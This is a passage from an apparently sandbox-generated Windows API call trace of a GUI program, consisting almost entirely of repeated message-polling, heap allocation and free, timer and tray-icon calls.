hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.217] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.217] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.217] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.217] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.217] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.217] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.247] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.264] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.309] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.356] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.358] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.403] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.435] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.457] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.497] TranslateMessage (lpMsg=0x87f89c) returned 0 [0155.497] DispatchMessageW (lpMsg=0x87f89c) returned 0x0 [0155.497] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ef38) returned 1 [0155.497] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0155.497] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0155.497] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0155.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17f0 [0155.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0155.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.498] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0155.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.498] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.498] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0155.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17f0 [0155.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0155.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.499] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0155.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.499] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.499] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0155.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17f0 [0155.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0155.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.500] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0155.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.500] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.500] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0155.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17f0 [0155.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0155.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.501] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0155.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.501] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.501] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0155.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17f0 [0155.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8e2778 [0155.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf2d8 | out: hHeap=0x8a0000) returned 1 [0155.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0155.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.502] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0155.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.503] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x91d5a8 | out: hHeap=0x8a0000) returned 1 [0155.503] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.503] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0155.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1850 [0155.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18a0 [0155.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0155.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0155.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18a0 | out: hHeap=0x8a0000) returned 1 [0155.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1850 | out: hHeap=0x8a0000) returned 1 [0155.503] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1850 [0155.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1850 | out: hHeap=0x8a0000) returned 1 [0155.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1850 [0155.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1850 | out: hHeap=0x8a0000) returned 1 [0155.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x91d5a8 [0155.504] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1850 [0155.504] RtlAllocateHeap 